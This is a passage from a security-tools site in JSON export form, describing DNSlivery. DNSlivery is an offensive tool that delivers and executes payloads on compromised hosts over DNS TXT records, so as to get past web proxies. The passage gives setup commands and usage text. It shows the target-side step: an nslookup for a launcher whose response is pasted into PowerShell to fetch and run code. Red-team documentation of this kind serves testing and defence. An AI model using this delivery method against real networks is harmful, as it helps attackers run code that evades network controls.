{"id":5432,"date":"2019-06-20T19:48:10","date_gmt":"2019-06-20T14:18:10","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=5432"},"modified":"2019-06-20T19:48:10","modified_gmt":"2019-06-20T14:18:10","slug":"dnslivery","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/dnslivery\/","title":{"rendered":"DNSlivery : Easy Files &#038; Payloads Delivery Over DNS"},"content":{"rendered":"\n<p><strong>DNSlivery<\/strong> allows to deliver files to a target using DNS as the transport protocol. Following are the features;<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>allows to print, execute or save files to the target<\/li><li>does not require any client on the target<\/li><li>does not require a full-fledged DNS server<\/li><\/ul>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>What problem are you trying to solve?<\/strong><\/p>\n\n\n\n<p>Easily deliver files and\/or payloads to a compromised target where classic web delivery is not possible and&nbsp;<strong>without the need for a dedicated client software<\/strong>. This applies to restricted environments where outgoing web traffic is forbidden or simply inspected by a curious web proxy.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-X4POdHEJ-CQ\/XQrbdkkTNrI\/AAAAAAAAA6s\/gGQ6kPibrloaGVkSdsQnZi0vhp94yMtNACLcBGAs\/s1600\/DNSlivery-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>Even though more complete DNS tunneling tools already exist (s.a.&nbsp;<a href=\"https:\/\/github.com\/iagox86\/dnscat2\">dnscat2<\/a>&nbsp;and&nbsp;<a href=\"https:\/\/code.kryo.se\/iodine\/\">iodine<\/a>), they all require to run a dedicated client on the target. The problem is that there is probably no other way then DNS to deliver the client in such restricted environments. In other words, building a DNS communication channel with these tools require to already have a DNS communication channel.<\/p>\n\n\n\n<p>In comparison, DNSlivery only provides one-way communication from your server to the target but does not require any dedicated client to do so. Thus, if you need to build a reliable two-way communication channel over DNS, use DNSlivery to deliver the client of a more advanced DNS tunneling tool to your target.<\/p>\n\n\n\n<p style=\"text-align:center\"><strong>Also Read  &#8211; <a href=\"https:\/\/kalilinuxtutorials.com\/getwin\/\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"GetWin : FUD Win32 Payload Generator &amp; Listener (opens in a new tab)\">GetWin : FUD Win32 Payload Generator &amp; Listener<\/a><\/strong><\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><a href=\"https:\/\/github.com\/no0be\/DNSlivery#how-does-it-work\"><\/a><strong>How does it work?<\/strong><\/p>\n\n\n\n<p>Just like most DNS tunneling tools, DNSlivery uses&nbsp;<code>TXT<\/code>&nbsp;records to store the content of files in their base64 representation. However, it does not require to setup a full-fledged DNS server to work. Instead, it uses the&nbsp;<a href=\"https:\/\/scapy.net\/\">scapy<\/a>&nbsp;library to listen for incoming DNS packets and craft the desired response.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-vwdeYQOUA1o\/XQrbdmudo8I\/AAAAAAAAA60\/zCmSxduHPwcAoSZkA5JzT0LJHoEVYEt1gCLcBGAs\/s1600\/DNSlivery-%2B2.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>As most files do not fit in a single&nbsp;<code>TXT<\/code>&nbsp;record, DNSlivery will create multiple ordered records containing base64 chunks of the file. As an example, the above diagram illustrates the delivery of the 42<sup>nd<\/sup>&nbsp;chunk of the file named&nbsp;<code>file<\/code>.<\/p>\n\n\n\n<p>In order to retrieve all base64 chunks and put them back together without the need for a dedicated client on the target, DNSlivery will generate for every file:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>a simple cleartext launcher<\/li><li>a reliable base64 encoded stager<\/li><\/ul>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-nyNc0vz5yvE\/XQrbdiuVcjI\/AAAAAAAAA6w\/2A3uarMrRTgRwKzuCvL8sbqaJDm5s0kbACLcBGAs\/s1600\/DNSlivery-3.png\" alt=\"\"\/><\/figure><\/div>\n\n\n\n<p>This two-stages delivery process is required to add features to the stager (s.a. handling lost DNS responses) that would otherwise not fit in a single&nbsp;<code>TXT<\/code>&nbsp;record.<\/p>\n\n\n\n<p style=\"text-align:left\"><a href=\"https:\/\/github.com\/no0be\/DNSlivery#note-on-target-compatibility\"><\/a><strong>Note on target compatibility<\/strong><\/p>\n\n\n\n<p>Currently, only PowerShell targets are supported. However, DNSlivery could be improved to support additional targets such as bash or python. Please let me know&nbsp;<a href=\"https:\/\/twitter.com\/no0be\">@no0be<\/a>&nbsp;if this is a feature that you would like to see being implemented.<\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><a href=\"https:\/\/github.com\/no0be\/DNSlivery#requirements\"><\/a><strong>Requirements<\/strong><\/p>\n\n\n\n<p>DNSlivery does not require to build a complex server infrastructure. In fact, there are only two simple requirements:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>be able to create a&nbsp;<code>NS<\/code>&nbsp;record in your public DNS zone<\/li><li>have a Linux server capable of receiving&nbsp;<code>udp\/53<\/code>&nbsp;traffic from the Internet<\/li><\/ul>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><a href=\"https:\/\/github.com\/no0be\/DNSlivery#setup\"><\/a><strong>Setup<\/strong><\/p>\n\n\n\n<p style=\"text-align:center\"><a href=\"https:\/\/github.com\/no0be\/DNSlivery#dns-zone\"><\/a><strong>DNS Zone<\/strong><\/p>\n\n\n\n<p>The first step is to delegate a sub-domain to the server that will run DNSlivery by creating a new&nbsp;<code>NS<\/code>&nbsp;record in your domain. As an example, I created the following record to delegate the sub-domain&nbsp;<code>dnsd.no0.be<\/code>&nbsp;to the server at&nbsp;<code>vps.no0.be<\/code>.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">dnsd    IN  NS vps.no0.be.\n<\/p>\n\n\n\n<p>If your zone is managed by a third-party provider, refer to their documentation to create the&nbsp;<code>NS<\/code>&nbsp;record.<\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><a href=\"https:\/\/github.com\/no0be\/DNSlivery#dnslivery-1\"><\/a><strong>DNSlivery<\/strong><\/p>\n\n\n\n<p>The only requirements to run DNSlivery are&nbsp;<code>python3<\/code>&nbsp;and its&nbsp;<code>scapy<\/code>&nbsp;library.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">git clone https:\/\/github.com\/no0be\/DNSlivery.git &amp;&amp; cd DNSlivery <br>pip install -r requirements.txt<\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><a href=\"https:\/\/github.com\/no0be\/DNSlivery#usage\"><\/a><strong>Usage<\/strong><\/p>\n\n\n\n<p style=\"text-align:center\"><a href=\"https:\/\/github.com\/no0be\/DNSlivery#server\"><\/a><strong>Server<\/strong><\/p>\n\n\n\n<p>DNSlivery will serve all files of a given directory (<code>pwd<\/code>&nbsp;by default) and needs to be&nbsp;<strong>run with root privileges<\/strong>&nbsp;to listen for incoming&nbsp;<code>udp\/53<\/code>&nbsp;packets.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>usage: <\/strong>dnslivery.py [-h] [-p PATH] [-s SIZE] [-v] interface domain nameserver<br><br><strong>DNSlivery &#8211; Easy files and payloads delivery over DNS<\/strong><br><br><strong>positional arguments:<\/strong><br>   interface             interface to listen to DNS traffic<br>   domain                FQDN name of the DNS zone<br>   nameserver            FQDN name of the server running DNSlivery<br><br><strong>optional arguments:<\/strong><br>   -h, &#8211;help            show this help message and exit<br>   -p PATH, &#8211;path PATH  path of directory to serve over DNS (default: pwd)<br>   -s SIZE, &#8211;size SIZE  size in bytes of base64 chunks (default: 255)<br>   -v, &#8211;verbose         increase verbosity<\/p>\n\n\n\n<p><strong>Example<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">$ sudo python3 dnslivery.py eth0 dnsd.no0.be vps.no0.be -p \/tmp\/dns-delivery<br><br>DNSlivery &#8211; Easy files and payloads delivery over DNS<br><br>[] File &#8220;file&#8221; ready for delivery at file.dnsd.no0.be (7 chunks) [] Listening for DNS queries\u2026<\/p>\n\n\n\n<p><strong>Note on filename normalization<\/strong><\/p>\n\n\n\n<p>As the charset allowed for domain names is much more restrictive than for UNIX filenames (per&nbsp;<a href=\"https:\/\/tools.ietf.org\/html\/rfc1035#section-2.3.1\">RFC1035<\/a>), DNSlivery will perform normalization when required.<\/p>\n\n\n\n<p><strong>Example<\/strong>:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">[*] File &#8220;My Awesome Powershell Script ;).ps1&#8221; ready for delivery at my-awesome-powershell-script&#8212;-ps1.dnsd.no0.be (1891 chunks)\n<\/p>\n\n\n\n<p><strong>Be aware that the current normalization code is not perfect as it does not take overlapping filenames or size limit into account.<\/strong><\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><a href=\"https:\/\/github.com\/no0be\/DNSlivery#target\"><\/a><strong>Target<\/strong><\/p>\n\n\n\n<p>On the target, start by&nbsp;<strong>retrieving the launcher<\/strong>&nbsp;of the desired file by requesting its dedicated&nbsp;<code>TXT<\/code>&nbsp;record. The following three launchers are supported:<\/p>\n\n\n\n<table class=\"wp-block-table\"><thead><tr><th>Action<\/th><th>Launcher<\/th><th>Description<\/th><\/tr><\/thead><tbody><tr><td>Print<\/td><td><code>[filename].print.[domain]<\/code><\/td><td>(<strong>Default<\/strong>) Print the delivered file to the console<\/td><\/tr><tr><td>Execute<\/td><td><code>[filename].exec.[domain]<\/code><\/td><td>Execute the delivered file (useful for scripts)<\/td><\/tr><tr><td>Save<\/td><td><code>[filename].save.[domain]<\/code><\/td><td>Save the delivered file to disk (useful for binaries)<\/td><\/tr><\/tbody><\/table>\n\n\n\n<pre class=\"wp-block-preformatted\">nslookup -type=txt [filename].[stager].[domain]<\/pre>\n\n\n\n<p>Then, simply&nbsp;<strong>copy and paste the launcher quoted in the DNS response to a PowerShell console<\/strong>&nbsp;to retrieve the file on the target.<\/p>\n\n\n\n<div class=\"wp-block-button aligncenter is-style-squared\"><a class=\"wp-block-button__link has-background has-vivid-cyan-blue-background-color\" href=\"https:\/\/github.com\/no0be\/DNSlivery#what-problem-are-you-trying-to-solve\"><strong>Download<\/strong><\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>DNSlivery allows to deliver files to a target using DNS as the transport protocol. Following are the features; allows to print, execute or save files to the target does not require any client on the target does not require a full-fledged DNS server What problem are you trying to solve? Easily deliver files and\/or payloads [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":15623,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif","fifu_image_alt":"DNSlivery : Easy Files & Payloads Delivery Over DNS","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[891,911,998,2444],"class_list":["post-5432","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-dns","tag-dnslivery","tag-easy-files","tag-payloads-delivery"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>DNSlivery : Easy Files &amp; Payloads Delivery Over DNS<\/title>\n<meta name=\"description\" content=\"DNSlivery allows to deliver files to a target using DNS as the transport protocol. Following are the features, allows to print, execute\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/dnslivery\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"DNSlivery : Easy Files &amp; Payloads Delivery Over DNS\" \/>\n<meta property=\"og:description\" content=\"DNSlivery allows to deliver files to a target using DNS as the transport protocol. Following are the features, allows to print, execute\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/dnslivery\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2019-06-20T14:18:10+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnslivery\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnslivery\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"DNSlivery : Easy Files &#038; Payloads Delivery Over DNS\",\"datePublished\":\"2019-06-20T14:18:10+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnslivery\/\"},\"wordCount\":896,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnslivery\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif\",\"keywords\":[\"dns\",\"DNSlivery\",\"Easy Files\",\"Payloads Delivery\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnslivery\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/dnslivery\/\",\"name\":\"DNSlivery : Easy Files & Payloads Delivery Over DNS\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnslivery\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnslivery\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif\",\"datePublished\":\"2019-06-20T14:18:10+00:00\",\"description\":\"DNSlivery allows to deliver files to a target using DNS as the transport protocol. Following are the features, allows to print, execute\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/dnslivery\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/dnslivery\/#primaryimage\",\"url\":\"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif\",\"contentUrl\":\"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"DNSlivery : Easy Files & Payloads Delivery Over DNS","description":"DNSlivery allows to deliver files to a target using DNS as the transport protocol. Following are the features, allows to print, execute","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/dnslivery\/","og_locale":"en_US","og_type":"article","og_title":"DNSlivery : Easy Files & Payloads Delivery Over DNS","og_description":"DNSlivery allows to deliver files to a target using DNS as the transport protocol. Following are the features, allows to print, execute","og_url":"https:\/\/kalilinuxtutorials.com\/dnslivery\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2019-06-20T14:18:10+00:00","og_image":[{"url":"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/dnslivery\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/dnslivery\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"DNSlivery : Easy Files &#038; Payloads Delivery Over DNS","datePublished":"2019-06-20T14:18:10+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/dnslivery\/"},"wordCount":896,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/dnslivery\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif","keywords":["dns","DNSlivery","Easy Files","Payloads Delivery"],"articleSection":["Kali Linux"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/dnslivery\/","url":"https:\/\/kalilinuxtutorials.com\/dnslivery\/","name":"DNSlivery : Easy Files & Payloads Delivery Over DNS","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/dnslivery\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/dnslivery\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif","datePublished":"2019-06-20T14:18:10+00:00","description":"DNSlivery allows to deliver files to a target using DNS as the transport protocol. Following are the features, allows to print, execute","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/dnslivery\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/dnslivery\/#primaryimage","url":"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif","contentUrl":"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/1.bp.blogspot.com\/-bHbcsCPUMV0\/XQrdH4moHaI\/AAAAAAAAA7Q\/5fWgNAIQIMcQb9hShML2MsqBocAN3EAXQCLcBGAs\/s1600\/DNSlivery%2B-%2B1.gif","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":2784,"url":"https:\/\/kalilinuxtutorials.com\/singularity-dns-rebinding-attack\/","url_meta":{"origin":5432,"position":0},"title":"Singularity &#8211; A DNS Rebinding Attack Framework","author":"R K","date":"September 25, 2018","format":false,"excerpt":"Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine. It also ships with\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/09\/Singularity-Manager-Interface.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/09\/Singularity-Manager-Interface.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/09\/Singularity-Manager-Interface.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/09\/Singularity-Manager-Interface.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/09\/Singularity-Manager-Interface.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/09\/Singularity-Manager-Interface.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":14895,"url":"https:\/\/kalilinuxtutorials.com\/dnsstager\/","url_meta":{"origin":5432,"position":1},"title":"DNSStager : Hide Your Payload In DNS","author":"R K","date":"July 21, 2021","format":false,"excerpt":"DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. DNSStager will create a malicious DNS server that handles DNS requests to your domain and return your payload as a response to specific record requests such as\u00a0AAAA\u00a0or\u00a0TXT\u00a0records after splitting it into chunks and\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":10659,"url":"https:\/\/kalilinuxtutorials.com\/web-hackers-weapons\/","url_meta":{"origin":5432,"position":2},"title":"Web Hacker&#8217;s Weapons : Collection Of Cool Tools Used By Web Hackers","author":"R K","date":"May 29, 2020","format":false,"excerpt":"Web Hacker's Weapons is a collection of cool tools used by Web hackers. Happy hacking , Happy bug-hunting. Weapons Army-Knife\/ALLBurpSuitethe BurpSuite projectArmy-Knife\/SCANjaelesThe Swiss Army knife for automated Web Application TestingArmy-Knife\/ALLzaproxyThe OWASP ZAP core projectDiscovery\/ALLOneForAllOneForAll\u662f\u4e00\u6b3e\u529f\u80fd\u5f3a\u5927\u7684\u5b50\u57df\u6536\u96c6\u5de5\u5177Discovery\/ALLaquatoneA Tool for Domain FlyoversDiscovery\/ALLlazyreconThis script is intended to automate your reconnaissance process in an organized fashionDiscovery\/CRAWLPhotonIncredibly\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":10662,"url":"https:\/\/kalilinuxtutorials.com\/nishang\/","url_meta":{"origin":5432,"position":3},"title":"Nishang : Offensive PowerShell For Red Team, Penetration Testing &#038; Offensive Security","author":"R K","date":"May 29, 2020","format":false,"excerpt":"Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. 